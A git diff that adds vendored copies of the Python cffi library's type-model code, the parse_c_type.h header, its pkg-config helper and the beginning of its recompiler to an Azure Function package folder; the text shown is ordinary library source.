"(%s)" % (extra.lstrip(),) + self.c_name_with_marker = totype.c_name_with_marker.replace('&', extra) + + def build_backend_type(self, ffi, finishlist): + BItem = self.totype.get_cached_btype(ffi, finishlist, can_delay=True) + return global_cache(self, ffi, 'new_pointer_type', BItem) + +voidp_type = PointerType(void_type) + +def ConstPointerType(totype): + return PointerType(totype, Q_CONST) + +const_voidp_type = ConstPointerType(void_type) + + +class NamedPointerType(PointerType): + _attrs_ = ('totype', 'name') + + def __init__(self, totype, name, quals=0): + PointerType.__init__(self, totype, quals) + self.name = name + self.c_name_with_marker = name + '&' + + +class ArrayType(BaseType): + _attrs_ = ('item', 'length') + is_array_type = True + + def __init__(self, item, length): + self.item = item + self.length = length + # + if length is None: + brackets = '&[]' + elif length == '...': + brackets = '&[/*...*/]' + else: + brackets = '&[%s]' % length + self.c_name_with_marker = ( + self.item.c_name_with_marker.replace('&', brackets)) + + def length_is_unknown(self): + return isinstance(self.length, str) + + def resolve_length(self, newlength): + return ArrayType(self.item, newlength) + + def build_backend_type(self, ffi, finishlist): + if self.length_is_unknown(): + raise CDefError("cannot render the type %r: unknown length" % + (self,)) + self.item.get_cached_btype(ffi, finishlist) # force the item BType + BPtrItem = PointerType(self.item).get_cached_btype(ffi, finishlist) + return global_cache(self, ffi, 'new_array_type', BPtrItem, self.length) + +char_array_type = ArrayType(PrimitiveType('char'), None) + + +class StructOrUnionOrEnum(BaseTypeByIdentity): + _attrs_ = ('name',) + forcename = None + + def build_c_name_with_marker(self): + name = self.forcename or '%s %s' % (self.kind, self.name) + self.c_name_with_marker = name + '&' + + def force_the_name(self, forcename): + self.forcename = forcename + self.build_c_name_with_marker() + + def get_official_name(self): + assert self.c_name_with_marker.endswith('&') + return self.c_name_with_marker[:-1] + + +class StructOrUnion(StructOrUnionOrEnum): + fixedlayout = None + completed = 0 + partial = False + packed = 0 + + def __init__(self, name, fldnames, fldtypes, fldbitsize, fldquals=None): + self.name = name + self.fldnames = fldnames + self.fldtypes = fldtypes + self.fldbitsize = fldbitsize + self.fldquals = fldquals + self.build_c_name_with_marker() + + def anonymous_struct_fields(self): + if self.fldtypes is not None: + for name, type in zip(self.fldnames, self.fldtypes): + if name == '' and isinstance(type, StructOrUnion): + yield type + + def enumfields(self, expand_anonymous_struct_union=True): + fldquals = self.fldquals + if fldquals is None: + fldquals = (0,) * len(self.fldnames) + for name, type, bitsize, quals in zip(self.fldnames, self.fldtypes, + self.fldbitsize, fldquals): + if (name == '' and isinstance(type, StructOrUnion) + and expand_anonymous_struct_union): + # nested anonymous struct/union + for result in type.enumfields(): + yield result + else: + yield (name, type, bitsize, quals) + + def force_flatten(self): + # force the struct or union to have a declaration that lists + # directly all fields returned by enumfields(), flattening + # nested anonymous structs/unions. + names = [] + types = [] + bitsizes = [] + fldquals = [] + for name, type, bitsize, quals in self.enumfields(): + names.append(name) + types.append(type) + bitsizes.append(bitsize) + fldquals.append(quals) + self.fldnames = tuple(names) + self.fldtypes = tuple(types) + self.fldbitsize = tuple(bitsizes) + self.fldquals = tuple(fldquals) + + def get_cached_btype(self, ffi, finishlist, can_delay=False): + BType = StructOrUnionOrEnum.get_cached_btype(self, ffi, finishlist, + can_delay) + if not can_delay: + self.finish_backend_type(ffi, finishlist) + return BType + + def finish_backend_type(self, ffi, finishlist): + if self.completed: + if self.completed != 2: + raise NotImplementedError("recursive structure declaration " + "for '%s'" % (self.name,)) + return + BType = ffi._cached_btypes[self] + # + self.completed = 1 + # + if self.fldtypes is None: + pass # not completing it: it's an opaque struct + # + elif self.fixedlayout is None: + fldtypes = [tp.get_cached_btype(ffi, finishlist) + for tp in self.fldtypes] + lst = list(zip(self.fldnames, fldtypes, self.fldbitsize)) + extra_flags = () + if self.packed: + if self.packed == 1: + extra_flags = (8,) # SF_PACKED + else: + extra_flags = (0, self.packed) + ffi._backend.complete_struct_or_union(BType, lst, self, + -1, -1, *extra_flags) + # + else: + fldtypes = [] + fieldofs, fieldsize, totalsize, totalalignment = self.fixedlayout + for i in range(len(self.fldnames)): + fsize = fieldsize[i] + ftype = self.fldtypes[i] + # + if isinstance(ftype, ArrayType) and ftype.length_is_unknown(): + # fix the length to match the total size + BItemType = ftype.item.get_cached_btype(ffi, finishlist) + nlen, nrest = divmod(fsize, ffi.sizeof(BItemType)) + if nrest != 0: + self._verification_error( + "field '%s.%s' has a bogus size?" % ( + self.name, self.fldnames[i] or '{}')) + ftype = ftype.resolve_length(nlen) + self.fldtypes = (self.fldtypes[:i] + (ftype,) + + self.fldtypes[i+1:]) + # + BFieldType = ftype.get_cached_btype(ffi, finishlist) + if isinstance(ftype, ArrayType) and ftype.length is None: + assert fsize == 0 + else: + bitemsize = ffi.sizeof(BFieldType) + if bitemsize != fsize: + self._verification_error( + "field '%s.%s' is declared as %d bytes, but is " + "really %d bytes" % (self.name, + self.fldnames[i] or '{}', + bitemsize, fsize)) + fldtypes.append(BFieldType) + # + lst = list(zip(self.fldnames, fldtypes, self.fldbitsize, fieldofs)) + ffi._backend.complete_struct_or_union(BType, lst, self, + totalsize, totalalignment) + self.completed = 2 + + def _verification_error(self, msg): + raise VerificationError(msg) + + def check_not_partial(self): + if self.partial and self.fixedlayout is None: + raise VerificationMissing(self._get_c_name()) + + def build_backend_type(self, ffi, finishlist): + self.check_not_partial() + finishlist.append(self) + # + return global_cache(self, ffi, 'new_%s_type' % self.kind, + self.get_official_name(), key=self) + + +class StructType(StructOrUnion): + kind = 'struct' + + +class UnionType(StructOrUnion): + kind = 'union' + + +class EnumType(StructOrUnionOrEnum): + kind = 'enum' + partial = False + partial_resolved = False + + def __init__(self, name, enumerators, enumvalues, baseinttype=None): + self.name = name + self.enumerators = enumerators + self.enumvalues = enumvalues + self.baseinttype = baseinttype + self.build_c_name_with_marker() + + def force_the_name(self, forcename): + StructOrUnionOrEnum.force_the_name(self, forcename) + if self.forcename is None: + name = self.get_official_name() + self.forcename = '$' + name.replace(' ', '_') + + def check_not_partial(self): + if self.partial and not self.partial_resolved: + raise VerificationMissing(self._get_c_name()) + + def build_backend_type(self, ffi, finishlist): + self.check_not_partial() + base_btype = self.build_baseinttype(ffi, finishlist) + return global_cache(self, ffi, 'new_enum_type', + self.get_official_name(), + self.enumerators, self.enumvalues, + base_btype, key=self) + + def build_baseinttype(self, ffi, finishlist): + if self.baseinttype is not None: + return self.baseinttype.get_cached_btype(ffi, finishlist) + # + if self.enumvalues: + smallest_value = min(self.enumvalues) + largest_value = max(self.enumvalues) + else: + import warnings + try: + # XXX! The goal is to ensure that the warnings.warn() + # will not suppress the warning. We want to get it + # several times if we reach this point several times. + __warningregistry__.clear() + except NameError: + pass + warnings.warn("%r has no values explicitly defined; " + "guessing that it is equivalent to 'unsigned int'" + % self._get_c_name()) + smallest_value = largest_value = 0 + if smallest_value < 0: # needs a signed type + sign = 1 + candidate1 = PrimitiveType("int") + candidate2 = PrimitiveType("long") + else: + sign = 0 + candidate1 = PrimitiveType("unsigned int") + candidate2 = PrimitiveType("unsigned long") + btype1 = candidate1.get_cached_btype(ffi, finishlist) + btype2 = candidate2.get_cached_btype(ffi, finishlist) + size1 = ffi.sizeof(btype1) + size2 = ffi.sizeof(btype2) + if (smallest_value >= ((-1) << (8*size1-1)) and + largest_value < (1 << (8*size1-sign))): + return btype1 + if (smallest_value >= ((-1) << (8*size2-1)) and + largest_value < (1 << (8*size2-sign))): + return btype2 + raise CDefError("%s values don't all fit into either 'long' " + "or 'unsigned long'" % self._get_c_name()) + +def unknown_type(name, structname=None): + if structname is None: + structname = '$%s' % name + tp = StructType(structname, None, None, None) + tp.force_the_name(name) + tp.origin = "unknown_type" + return tp + +def unknown_ptr_type(name, structname=None): + if structname is None: + structname = '$$%s' % name + tp = StructType(structname, None, None, None) + return NamedPointerType(tp, name) + + +global_lock = allocate_lock() +_typecache_cffi_backend = weakref.WeakValueDictionary() + +def get_typecache(backend): + # returns _typecache_cffi_backend if backend is the _cffi_backend + # module, or type(backend).__typecache if backend is an instance of + # CTypesBackend (or some FakeBackend class during tests) + if isinstance(backend, types.ModuleType): + return _typecache_cffi_backend + with global_lock: + if not hasattr(type(backend), '__typecache'): + type(backend).__typecache = weakref.WeakValueDictionary() + return type(backend).__typecache + +def global_cache(srctype, ffi, funcname, *args, **kwds): + key = kwds.pop('key', (funcname, args)) + assert not kwds + try: + return ffi._typecache[key] + except KeyError: + pass + try: + res = getattr(ffi._backend, funcname)(*args) + except NotImplementedError as e: + raise NotImplementedError("%s: %r: %s" % (funcname, srctype, e)) + # note that setdefault() on WeakValueDictionary is not atomic + # and contains a rare bug (http://bugs.python.org/issue19542); + # we have to use a lock and do it ourselves + cache = ffi._typecache + with global_lock: + res1 = cache.get(key) + if res1 is None: + cache[key] = res + return res + else: + return res1 + +def pointer_cache(ffi, BType): + return global_cache('?', ffi, 'new_pointer_type', BType) + +def attach_exception_info(e, name): + if e.args and type(e.args[0]) is str: + e.args = ('%s: %s' % (name, e.args[0]),) + e.args[1:] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/parse_c_type.h b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/parse_c_type.h new file mode 100644 index 0000000..ea1aa24 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/parse_c_type.h @@ -0,0 +1,181 @@ + +/* This part is from file 'cffi/parse_c_type.h'. It is copied at the + beginning of C sources generated by CFFI's ffi.set_source(). */ + +typedef void *_cffi_opcode_t; + +#define _CFFI_OP(opcode, arg) (_cffi_opcode_t)(opcode | (((uintptr_t)(arg)) << 8)) +#define _CFFI_GETOP(cffi_opcode) ((unsigned char)(uintptr_t)cffi_opcode) +#define _CFFI_GETARG(cffi_opcode) (((intptr_t)cffi_opcode) >> 8) + +#define _CFFI_OP_PRIMITIVE 1 +#define _CFFI_OP_POINTER 3 +#define _CFFI_OP_ARRAY 5 +#define _CFFI_OP_OPEN_ARRAY 7 +#define _CFFI_OP_STRUCT_UNION 9 +#define _CFFI_OP_ENUM 11 +#define _CFFI_OP_FUNCTION 13 +#define _CFFI_OP_FUNCTION_END 15 +#define _CFFI_OP_NOOP 17 +#define _CFFI_OP_BITFIELD 19 +#define _CFFI_OP_TYPENAME 21 +#define _CFFI_OP_CPYTHON_BLTN_V 23 // varargs +#define _CFFI_OP_CPYTHON_BLTN_N 25 // noargs +#define _CFFI_OP_CPYTHON_BLTN_O 27 // O (i.e. a single arg) +#define _CFFI_OP_CONSTANT 29 +#define _CFFI_OP_CONSTANT_INT 31 +#define _CFFI_OP_GLOBAL_VAR 33 +#define _CFFI_OP_DLOPEN_FUNC 35 +#define _CFFI_OP_DLOPEN_CONST 37 +#define _CFFI_OP_GLOBAL_VAR_F 39 +#define _CFFI_OP_EXTERN_PYTHON 41 + +#define _CFFI_PRIM_VOID 0 +#define _CFFI_PRIM_BOOL 1 +#define _CFFI_PRIM_CHAR 2 +#define _CFFI_PRIM_SCHAR 3 +#define _CFFI_PRIM_UCHAR 4 +#define _CFFI_PRIM_SHORT 5 +#define _CFFI_PRIM_USHORT 6 +#define _CFFI_PRIM_INT 7 +#define _CFFI_PRIM_UINT 8 +#define _CFFI_PRIM_LONG 9 +#define _CFFI_PRIM_ULONG 10 +#define _CFFI_PRIM_LONGLONG 11 +#define _CFFI_PRIM_ULONGLONG 12 +#define _CFFI_PRIM_FLOAT 13 +#define _CFFI_PRIM_DOUBLE 14 +#define _CFFI_PRIM_LONGDOUBLE 15 + +#define _CFFI_PRIM_WCHAR 16 +#define _CFFI_PRIM_INT8 17 +#define _CFFI_PRIM_UINT8 18 +#define _CFFI_PRIM_INT16 19 +#define _CFFI_PRIM_UINT16 20 +#define _CFFI_PRIM_INT32 21 +#define _CFFI_PRIM_UINT32 22 +#define _CFFI_PRIM_INT64 23 +#define _CFFI_PRIM_UINT64 24 +#define _CFFI_PRIM_INTPTR 25 +#define _CFFI_PRIM_UINTPTR 26 +#define _CFFI_PRIM_PTRDIFF 27 +#define _CFFI_PRIM_SIZE 28 +#define _CFFI_PRIM_SSIZE 29 +#define _CFFI_PRIM_INT_LEAST8 30 +#define _CFFI_PRIM_UINT_LEAST8 31 +#define _CFFI_PRIM_INT_LEAST16 32 +#define _CFFI_PRIM_UINT_LEAST16 33 +#define _CFFI_PRIM_INT_LEAST32 34 +#define _CFFI_PRIM_UINT_LEAST32 35 +#define _CFFI_PRIM_INT_LEAST64 36 +#define _CFFI_PRIM_UINT_LEAST64 37 +#define _CFFI_PRIM_INT_FAST8 38 +#define _CFFI_PRIM_UINT_FAST8 39 +#define _CFFI_PRIM_INT_FAST16 40 +#define _CFFI_PRIM_UINT_FAST16 41 +#define _CFFI_PRIM_INT_FAST32 42 +#define _CFFI_PRIM_UINT_FAST32 43 +#define _CFFI_PRIM_INT_FAST64 44 +#define _CFFI_PRIM_UINT_FAST64 45 +#define _CFFI_PRIM_INTMAX 46 +#define _CFFI_PRIM_UINTMAX 47 +#define _CFFI_PRIM_FLOATCOMPLEX 48 +#define _CFFI_PRIM_DOUBLECOMPLEX 49 +#define _CFFI_PRIM_CHAR16 50 +#define _CFFI_PRIM_CHAR32 51 + +#define _CFFI__NUM_PRIM 52 +#define _CFFI__UNKNOWN_PRIM (-1) +#define _CFFI__UNKNOWN_FLOAT_PRIM (-2) +#define _CFFI__UNKNOWN_LONG_DOUBLE (-3) + +#define _CFFI__IO_FILE_STRUCT (-1) + + +struct _cffi_global_s { + const char *name; + void *address; + _cffi_opcode_t type_op; + void *size_or_direct_fn; // OP_GLOBAL_VAR: size, or 0 if unknown + // OP_CPYTHON_BLTN_*: addr of direct function +}; + +struct _cffi_getconst_s { + unsigned long long value; + const struct _cffi_type_context_s *ctx; + int gindex; +}; + +struct _cffi_struct_union_s { + const char *name; + int type_index; // -> _cffi_types, on a OP_STRUCT_UNION + int flags; // _CFFI_F_* flags below + size_t size; + int alignment; + int first_field_index; // -> _cffi_fields array + int num_fields; +}; +#define _CFFI_F_UNION 0x01 // is a union, not a struct +#define _CFFI_F_CHECK_FIELDS 0x02 // complain if fields are not in the + // "standard layout" or if some are missing +#define _CFFI_F_PACKED 0x04 // for CHECK_FIELDS, assume a packed struct +#define _CFFI_F_EXTERNAL 0x08 // in some other ffi.include() +#define _CFFI_F_OPAQUE 0x10 // opaque + +struct _cffi_field_s { + const char *name; + size_t field_offset; + size_t field_size; + _cffi_opcode_t field_type_op; +}; + +struct _cffi_enum_s { + const char *name; + int type_index; // -> _cffi_types, on a OP_ENUM + int type_prim; // _CFFI_PRIM_xxx + const char *enumerators; // comma-delimited string +}; + +struct _cffi_typename_s { + const char *name; + int type_index; /* if opaque, points to a possibly artificial + OP_STRUCT which is itself opaque */ +}; + +struct _cffi_type_context_s { + _cffi_opcode_t *types; + const struct _cffi_global_s *globals; + const struct _cffi_field_s *fields; + const struct _cffi_struct_union_s *struct_unions; + const struct _cffi_enum_s *enums; + const struct _cffi_typename_s *typenames; + int num_globals; + int num_struct_unions; + int num_enums; + int num_typenames; + const char *const *includes; + int num_types; + int flags; /* future extension */ +}; + +struct _cffi_parse_info_s { + const struct _cffi_type_context_s *ctx; + _cffi_opcode_t *output; + unsigned int output_size; + size_t error_location; + const char *error_message; +}; + +struct _cffi_externpy_s { + const char *name; + size_t size_of_result; + void *reserved1, *reserved2; +}; + +#ifdef _CFFI_INTERNAL +static int parse_c_type(struct _cffi_parse_info_s *info, const char *input); +static int search_in_globals(const struct _cffi_type_context_s *ctx, + const char *search, size_t search_len); +static int search_in_struct_unions(const struct _cffi_type_context_s *ctx, + const char *search, size_t search_len); +#endif diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/pkgconfig.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/pkgconfig.py new file mode 100644 index 0000000..89708a5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/pkgconfig.py @@ -0,0 +1,121 @@ +# pkg-config, https://www.freedesktop.org/wiki/Software/pkg-config/ integration for cffi +import sys, os, subprocess + +from .error import PkgConfigError + + +def merge_flags(cfg1, cfg2): + """Merge values from cffi config flags cfg2 to cf1 + + Example: + merge_flags({"libraries": ["one"]}, {"libraries": ["two"]}) + {"libraries": ["one", "two"]} + """ + for key, value in cfg2.items(): + if key not in cfg1: + cfg1[key] = value + else: + if not isinstance(cfg1[key], list): + raise TypeError("cfg1[%r] should be a list of strings" % (key,)) + if not isinstance(value, list): + raise TypeError("cfg2[%r] should be a list of strings" % (key,)) + cfg1[key].extend(value) + return cfg1 + + +def call(libname, flag, encoding=sys.getfilesystemencoding()): + """Calls pkg-config and returns the output if found + """ + a = ["pkg-config", "--print-errors"] + a.append(flag) + a.append(libname) + try: + pc = subprocess.Popen(a, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + except EnvironmentError as e: + raise PkgConfigError("cannot run pkg-config: %s" % (str(e).strip(),)) + + bout, berr = pc.communicate() + if pc.returncode != 0: + try: + berr = berr.decode(encoding) + except Exception: + pass + raise PkgConfigError(berr.strip()) + + if sys.version_info >= (3,) and not isinstance(bout, str): # Python 3.x + try: + bout = bout.decode(encoding) + except UnicodeDecodeError: + raise PkgConfigError("pkg-config %s %s returned bytes that cannot " + "be decoded with encoding %r:\n%r" % + (flag, libname, encoding, bout)) + + if os.altsep != '\\' and '\\' in bout: + raise PkgConfigError("pkg-config %s %s returned an unsupported " + "backslash-escaped output:\n%r" % + (flag, libname, bout)) + return bout + + +def flags_from_pkgconfig(libs): + r"""Return compiler line flags for FFI.set_source based on pkg-config output + + Usage + ... + ffibuilder.set_source("_foo", pkgconfig = ["libfoo", "libbar >= 1.8.3"]) + + If pkg-config is installed on build machine, then arguments include_dirs, + library_dirs, libraries, define_macros, extra_compile_args and + extra_link_args are extended with an output of pkg-config for libfoo and + libbar. + + Raises PkgConfigError in case the pkg-config call fails. + """ + + def get_include_dirs(string): + return [x[2:] for x in string.split() if x.startswith("-I")] + + def get_library_dirs(string): + return [x[2:] for x in string.split() if x.startswith("-L")] + + def get_libraries(string): + return [x[2:] for x in string.split() if x.startswith("-l")] + + # convert -Dfoo=bar to list of tuples [("foo", "bar")] expected by distutils + def get_macros(string): + def _macro(x): + x = x[2:] # drop "-D" + if '=' in x: + return tuple(x.split("=", 1)) # "-Dfoo=bar" => ("foo", "bar") + else: + return (x, None) # "-Dfoo" => ("foo", None) + return [_macro(x) for x in string.split() if x.startswith("-D")] + + def get_other_cflags(string): + return [x for x in string.split() if not x.startswith("-I") and + not x.startswith("-D")] + + def get_other_libs(string): + return [x for x in string.split() if not x.startswith("-L") and + not x.startswith("-l")] + + # return kwargs for given libname + def kwargs(libname): + fse = sys.getfilesystemencoding() + all_cflags = call(libname, "--cflags") + all_libs = call(libname, "--libs") + return { + "include_dirs": get_include_dirs(all_cflags), + "library_dirs": get_library_dirs(all_libs), + "libraries": get_libraries(all_libs), + "define_macros": get_macros(all_cflags), + "extra_compile_args": get_other_cflags(all_cflags), + "extra_link_args": get_other_libs(all_libs), + } + + # merge all arguments together + ret = {} + for libname in libs: + lib_flags = kwargs(libname) + merge_flags(ret, lib_flags) + return ret diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/recompiler.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/recompiler.py new file mode 100644 index 0000000..4e33dde --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/recompiler.py @@ -0,0 +1,1581 @@ +import os, sys, io +from . import ffiplatform, model +from .error import VerificationError +from .cffi_opcode import * + +VERSION_BASE = 0x2601 +VERSION_EMBEDDED = 0x2701 +VERSION_CHAR16CHAR32 = 0x2801 + +USE_LIMITED_API = (sys.platform != 'win32' or sys.version_info < (3, 0) or + sys.version_info >= (3, 5)) + + +class GlobalExpr: + def __init__(self, name, address, type_op, size=0, check_value=0): + self.name = name + self.address = address + self.type_op = type_op + self.size = size + self.check_value = check_value + + def as_c_expr(self): + return ' { "%s", (void *)%s, %s, (void *)%s },' % ( + self.name, self.address, self.type_op.as_c_expr(), self.size) + + def as_python_expr(self): + return "b'%s%s',%d" % (self.type_op.as_python_bytes(), self.name, + self.check_value) + +class FieldExpr: + def __init__(self, name, field_offset, field_size, fbitsize, field_type_op): + self.name = name + self.field_offset = field_offset + self.field_size = field_size + self.fbitsize = fbitsize + self.field_type_op = field_type_op + + def as_c_expr(self): + spaces = " " * len(self.name) + return (' { "%s", %s,\n' % (self.name, self.field_offset) + + ' %s %s,\n' % (spaces, self.field_size) + + ' %s %s },' % (spaces, self.field_type_op.as_c_expr())) + + def as_python_expr(self): + raise NotImplementedError + + def as_field_python_expr(self): + if self.field_type_op.op == OP_NOOP: + size_expr = '' + elif self.field_type_op.op == OP_BITFIELD: + size_expr = format_four_bytes(self.fbitsize) + else: + raise NotImplementedError + return "b'%s%s%s'" % (self.field_type_op.as_python_bytes(), + size_expr, + self.name) + +class StructUnionExpr: + def __init__(self, name, type_index, flags, size, alignment, comment, + first_field_index, c_fields): + self.name = name + self.type_index = type_index + self.flags = flags + self.size = size + self.alignment = alignment + self.comment = comment + self.first_field_index = first_field_index + self.c_fields = c_fields + + def as_c_expr(self): + return (' { "%s", %d, %s,' % (self.name, self.type_index, self.flags) + + '\n %s, %s, ' % (self.size, self.alignment) + + '%d, %d ' % (self.first_field_index, len(self.c_fields)) + + ('/* %s */ ' % self.comment if self.comment else '') + + '},') + + def as_python_expr(self): + flags = eval(self.flags, G_FLAGS) + fields_expr = [c_field.as_field_python_expr() + for c_field in self.c_fields] + return "(b'%s%s%s',%s)" % ( + format_four_bytes(self.type_index), + format_four_bytes(flags), + self.name, + ','.join(fields_expr)) + +class EnumExpr: + def __init__(self, name, type_index, size, signed, allenums): + self.name = name + self.type_index = type_index + self.size = size + self.signed = signed + self.allenums = allenums + + def as_c_expr(self): + return (' { "%s", %d, _cffi_prim_int(%s, %s),\n' + ' "%s" },' % (self.name, self.type_index, + self.size, self.signed, self.allenums)) + + def as_python_expr(self): + prim_index = { + (1, 0): PRIM_UINT8, (1, 1): PRIM_INT8, + (2, 0): PRIM_UINT16, (2, 1): PRIM_INT16, + (4, 0): PRIM_UINT32, (4, 1): PRIM_INT32, + (8, 0): PRIM_UINT64, (8, 1): PRIM_INT64, + }[self.size, self.signed] + return "b'%s%s%s\\x00%s'" % (format_four_bytes(self.type_index), + format_four_bytes(prim_index), + self.name, self.allenums) + +class TypenameExpr: + def __init__(self, name, type_index): + self.name = name + self.type_index = type_index + + def as_c_expr(self): + return ' { "%s", %d },' % (self.name, self.type_index) + + def as_python_expr(self): + return "b'%s%s'" % (format_four_bytes(self.type_index), self.name) + + +# ____________________________________________________________ + + +class Recompiler: + _num_externpy = 0 + + def __init__(self, ffi, module_name, target_is_python=False): + self.ffi = ffi + self.module_name = module_name + self.target_is_python = target_is_python + self._version = VERSION_BASE + + def needs_version(self, ver): + self._version = max(self._version, ver) + + def collect_type_table(self): + self._typesdict = {} + self._generate("collecttype") + # + all_decls = sorted(self._typesdict, key=str) + # + # prepare all FUNCTION bytecode sequences first + self.cffi_types = [] + for tp in all_decls: + if tp.is_raw_function: + assert self._typesdict[tp] is None + self._typesdict[tp] = len(self.cffi_types) + self.cffi_types.append(tp) # placeholder + for tp1 in tp.args: + assert isinstance(tp1, (model.VoidType, + model.BasePrimitiveType, + model.PointerType, + model.StructOrUnionOrEnum, + model.FunctionPtrType)) + if self._typesdict[tp1] is None: + self._typesdict[tp1] = len(self.cffi_types) + self.cffi_types.append(tp1) # placeholder + self.cffi_types.append('END') # placeholder + # + # prepare all OTHER bytecode sequences + for tp in all_decls: + if not tp.is_raw_function and self._typesdict[tp] is None: + self._typesdict[tp] = len(self.cffi_types) + self.cffi_types.append(tp) # placeholder + if tp.is_array_type and tp.length is not None: + self.cffi_types.append('LEN') # placeholder + assert None not in self._typesdict.values() + # + # collect all structs and unions and enums + self._struct_unions = {} + self._enums = {} + for tp in all_decls: + if isinstance(tp, model.StructOrUnion): + self._struct_unions[tp] = None + elif isinstance(tp, model.EnumType): + self._enums[tp] = None + for i, tp in enumerate(sorted(self._struct_unions, + key=lambda tp: tp.name)): + self._struct_unions[tp] = i + for i, tp in enumerate(sorted(self._enums, + key=lambda tp: tp.name)): + self._enums[tp] = i + # + # emit all bytecode sequences now + for tp in all_decls: + method = getattr(self, '_emit_bytecode_' + tp.__class__.__name__) + method(tp, self._typesdict[tp]) + # + # consistency check + for op in self.cffi_types: + assert isinstance(op, CffiOp) + self.cffi_types = tuple(self.cffi_types) # don't change any more + + def _enum_fields(self, tp): + # When producing C, expand all anonymous struct/union fields. + # That's necessary to have C code checking the offsets of the + # individual fields contained in them. When producing Python, + # don't do it and instead write it like it is, with the + # corresponding fields having an empty name. Empty names are + # recognized at runtime when we import the generated Python + # file. + expand_anonymous_struct_union = not self.target_is_python + return tp.enumfields(expand_anonymous_struct_union) + + def _do_collect_type(self, tp): + if not isinstance(tp, model.BaseTypeByIdentity): + if isinstance(tp, tuple): + for x in tp: + self._do_collect_type(x) + return + if tp not in self._typesdict: + self._typesdict[tp] = None + if isinstance(tp, model.FunctionPtrType): + self._do_collect_type(tp.as_raw_function()) + elif isinstance(tp, model.StructOrUnion): + if tp.fldtypes is not None and ( + tp not in self.ffi._parser._included_declarations): + for name1, tp1, _, _ in self._enum_fields(tp): + self._do_collect_type(self._field_type(tp, name1, tp1)) + else: + for _, x in tp._get_items(): + self._do_collect_type(x) + + def _generate(self, step_name): + lst = self.ffi._parser._declarations.items() + for name, (tp, quals) in sorted(lst): + kind, realname = name.split(' ', 1) + try: + method = getattr(self, '_generate_cpy_%s_%s' % (kind, + step_name)) + except AttributeError: + raise VerificationError( + "not implemented in recompile(): %r" % name) + try: + self._current_quals = quals + method(tp, realname) + except Exception as e: + model.attach_exception_info(e, name) + raise + + # ---------- + + ALL_STEPS = ["global", "field", "struct_union", "enum", "typename"] + + def collect_step_tables(self): + # collect the declarations for '_cffi_globals', '_cffi_typenames', etc. + self._lsts = {} + for step_name in self.ALL_STEPS: + self._lsts[step_name] = [] + self._seen_struct_unions = set() + self._generate("ctx") + self._add_missing_struct_unions() + # + for step_name in self.ALL_STEPS: + lst = self._lsts[step_name] + if step_name != "field": + lst.sort(key=lambda entry: entry.name) + self._lsts[step_name] = tuple(lst) # don't change any more + # + # check for a possible internal inconsistency: _cffi_struct_unions + # should have been generated with exactly self._struct_unions + lst = self._lsts["struct_union"] + for tp, i in self._struct_unions.items(): + assert i < len(lst) + assert lst[i].name == tp.name + assert len(lst) == len(self._struct_unions) + # same with enums + lst = self._lsts["enum"] + for tp, i in self._enums.items(): + assert i < len(lst) + assert lst[i].name == tp.name + assert len(lst) == len(self._enums) + + # ---------- + + def _prnt(self, what=''): + self._f.write(what + '\n') + + def write_source_to_f(self, f, preamble): + if self.target_is_python: + assert preamble is None + self.write_py_source_to_f(f) + else: + assert preamble is not None + self.write_c_source_to_f(f, preamble) + + def _rel_readlines(self, filename): + g = open(os.path.join(os.path.dirname(__file__), filename), 'r') + lines = g.readlines() + g.close() + return lines + + def write_c_source_to_f(self, f, preamble): + self._f = f + prnt = self._prnt + if self.ffi._embedding is not None: + prnt('#define _CFFI_USE_EMBEDDING') + if not USE_LIMITED_API: + prnt('#define _CFFI_NO_LIMITED_API') + # + # first the '#include' (actually done by inlining the file's content) + lines = self._rel_readlines('_cffi_include.h') + i = lines.index('#include "parse_c_type.h"\n') + lines[i:i+1] = self._rel_readlines('parse_c_type.h') + prnt(''.join(lines)) + # + # if we have ffi._embedding != None, we give it here as a macro + # and include an extra file + base_module_name = self.module_name.split('.')[-1] + if self.ffi._embedding is not None: + prnt('#define _CFFI_MODULE_NAME "%s"' % (self.module_name,)) + prnt('static const char _CFFI_PYTHON_STARTUP_CODE[] = {') + self._print_string_literal_in_array(self.ffi._embedding) + prnt('0 };') + prnt('#ifdef PYPY_VERSION') + prnt('# define _CFFI_PYTHON_STARTUP_FUNC _cffi_pypyinit_%s' % ( + base_module_name,)) + prnt('#elif PY_MAJOR_VERSION >= 3') + prnt('# define _CFFI_PYTHON_STARTUP_FUNC PyInit_%s' % ( + base_module_name,)) + prnt('#else') + prnt('# define _CFFI_PYTHON_STARTUP_FUNC init%s' % ( + base_module_name,)) + prnt('#endif') + lines = self._rel_readlines('_embedding.h') + i = lines.index('#include "_cffi_errors.h"\n') + lines[i:i+1] = self._rel_readlines('_cffi_errors.h') + prnt(''.join(lines)) + self.needs_version(VERSION_EMBEDDED) + # + # then paste the C source given by the user, verbatim. + prnt('/************************************************************/') + prnt() + prnt(preamble) + prnt() + prnt('/************************************************************/') + prnt() + # + # the declaration of '_cffi_types' + prnt('static void *_cffi_types[] = {') + typeindex2type = dict([(i, tp) for (tp, i) in self._typesdict.items()]) + for i, op in enumerate(self.cffi_types): + comment = '' + if i in typeindex2type: + comment = ' // ' + typeindex2type[i]._get_c_name() + prnt('/* %2d */ %s,%s' % (i, op.as_c_expr(), comment)) + if not self.cffi_types: + prnt(' 0') + prnt('};') + prnt() + # + # call generate_cpy_xxx_decl(), for every xxx found from + # ffi._parser._declarations. This generates all the functions. + self._seen_constants = set() + self._generate("decl") + # + # the declaration of '_cffi_globals' and '_cffi_typenames' + nums = {} + for step_name in self.ALL_STEPS: + lst = self._lsts[step_name] + nums[step_name] = len(lst) + if nums[step_name] > 0: + prnt('static const struct _cffi_%s_s _cffi_%ss[] = {' % ( + step_name, step_name)) + for entry in lst: + prnt(entry.as_c_expr()) + prnt('};') + prnt() + # + # the declaration of '_cffi_includes' + if self.ffi._included_ffis: + prnt('static const char * const _cffi_includes[] = {') + for ffi_to_include in self.ffi._included_ffis: + try: + 